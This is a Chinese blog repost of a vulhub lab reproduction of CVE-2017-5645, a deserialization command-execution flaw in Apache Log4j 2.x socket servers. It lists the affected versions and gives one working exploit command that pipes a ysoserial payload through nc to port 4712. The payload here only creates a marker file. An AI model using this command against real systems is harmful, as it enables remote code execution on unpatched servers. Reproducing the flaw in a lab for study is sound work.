Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645）

100 阅读 0 评论 66 点赞

我是靠谱客的博主傲娇小土豆，最近开发中收集的这篇文章主要介绍Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645），觉得挺不错的，现在分享给大家，希望可以做个参考。

概述

影响范围

Apache Log4j 2.8.2之前的2.x版本

漏洞复现

使用ysoserial生成payload，然后直接发送给your-ip:4712端口即可

java -jar ysoserial.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712

返回容器查看
在这里插入图片描述

最后

以上就是傲娇小土豆为你收集整理的Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645）的全部内容，希望文章能够帮你解决Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645）所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供，作为学习参考使用，或来自网络收集整理，版权属于原作者所有。

点赞(66)

本文分类：vulhub漏洞复现
浏览次数：100 次浏览
发布日期：2024-07-12 13:20:01
本文链接：https://www.kaopuke.com/article/k-p-k_13_u_7_o_18_fx_14_jky.html

相关文章

Apache Log4j爆“核弹级“漏洞，对众多java应用平台造成影响，已发现近万次攻击

Apache Log4j爆“核弹级“漏洞，对众多java应用平台造成影响，已发现近万次攻击

Apache Log4j 漏洞修复Log4j 漏洞修复1、漏洞介绍2、漏洞修复

Apache Log4j 漏洞修复Log4j 漏洞修复1、漏洞介绍2、漏洞修复

Log4j2的使用demo

December 2021 Apache Log4j Vulnerabilities on Oracle Products and Services(Doc ID 2827611.1)PURPOSESCOPEDETAILS

December 2021 Apache Log4j Vulnerabilities on Oracle Products and Services(Doc ID 2827611.1)PURPOSESCOPEDETAILS

Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645）

Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645）

漏洞复现 | SaltStack认证绕过（CVE‐2020‐11651）

漏洞复现 | SaltStack认证绕过（CVE‐2020‐11651）

框架漏洞学习日记——第三天（CVE-2017-5645）

框架漏洞学习日记——第三天（CVE-2017-5645）

Flex 序列和反序列化ArrayCollection

Flex 序列和反序列化ArrayCollection

评论列表共有 0 条评论

发表评论取消回复

立即
投稿返回
顶部